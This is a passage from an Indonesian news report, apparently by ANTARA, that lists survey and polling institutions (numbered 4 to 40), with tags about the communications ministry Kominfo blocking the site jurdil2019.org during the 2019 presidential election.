4. Pusat Penelitian dan Pengembangan, Pendidikan, dan Pelatihan Radio Republik Indonesia
5. Charta Politika Indonesia
6. Indo Barometer
7. Penelitian dan Pengembangan Kompas
8. Saiful Mujani Research & Consulting (SMRC)
9. Indikator Politik Indonesia
10. Indekstat Konsultan Indonesia
11. Jaringan Suara Indonesia
12. Populi Center
13. Lingkaran Survey Kebijakan Publik
14. Citra Publik Indonesia
15. Survey Strategi Indonesia
16. Jaringan Isu Publik
17. Lingkaran Survey Indonesia
18. Citra Komunikasi LSI
19. Konsultan Citra Indonesia
20. Citra Publik
21. Cyrus Network
22. Rataka Institute
23. Lembaga Survei Kuadran
24. Media Survey Nasional
25. Indodata
26. Celebes Research Center
27. Roda Tiga Konsultan
28. Indomatrik
29. Puskaptis
30. Pusat Riset Indonesia (PRI)
31. PT. Data LSI (Lembaga Survei Indonesia)
32. Centre for Strategic and International Studies (CSIS)
33. Voxpol Center Research & Consultan
34. FIXPOLL Media Polling Indonesia
35. Cirus Curveyors Group
36. Arus Survei Indonesia
37. Konsepindo Research and Consulting
38. PolMark Indonesia
39. PT. Parameter Konsultindo
40. Lembaga Real Count Nusantara. (ANTARA/gil)

TAG:
Kominfo Blokir Situs Jurdil2019.org
jurdil2019.org
kominfo blokir jurdil2019.org
situs jurdil2019 di blokir
pemilu 2019
jurdil2019
pilpres 2019